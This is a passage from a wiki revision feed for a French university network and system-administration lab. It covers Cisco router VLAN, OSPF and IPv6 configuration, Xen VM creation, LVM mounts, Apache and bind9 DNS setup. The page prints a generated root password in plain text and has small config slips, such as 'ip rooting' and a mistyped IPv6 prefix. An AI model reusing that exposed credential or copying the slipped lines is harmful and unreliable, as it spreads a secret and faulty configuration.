   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51402</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51402"/>
				<updated>2019-11-29T11:41:28Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Modification de /etc/bind/named.conf.options */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
==== Paquetages nécessaires pour RAID5 ====&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
